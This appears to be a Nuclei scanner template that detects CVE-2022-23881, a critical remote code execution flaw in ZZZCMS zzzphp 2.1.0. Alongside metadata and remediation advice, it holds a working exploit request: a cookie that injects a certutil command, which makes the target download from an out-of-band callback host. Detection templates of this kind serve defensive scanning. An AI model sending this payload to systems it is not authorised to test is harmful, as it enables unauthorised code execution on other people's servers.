id: CVE-2022-23881 info: name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. reference: - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md - http://www.zzzcms.com - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23881 cwe-id: CWE-77 epss-score: 0.19726 epss-percentile: 0.95888 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zzzcms product: zzzphp tags: cve,cve2022,rce,zzzphp,zzzcms http: - raw: - | GET /?location=search HTTP/1.1 Host: {{Hostname}} Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 500 # digest: 4a0a00473045022100f59d85c68b56c4f48b6cd9f62fbf722f88f7d0897cca2472e5226789f2a9ca0a022011d7ab1a3012c849f2281668d15a6645c53993fe9c94e246dfee9ac5a2ffb814:922c64590222798bb761d5b6d8e72950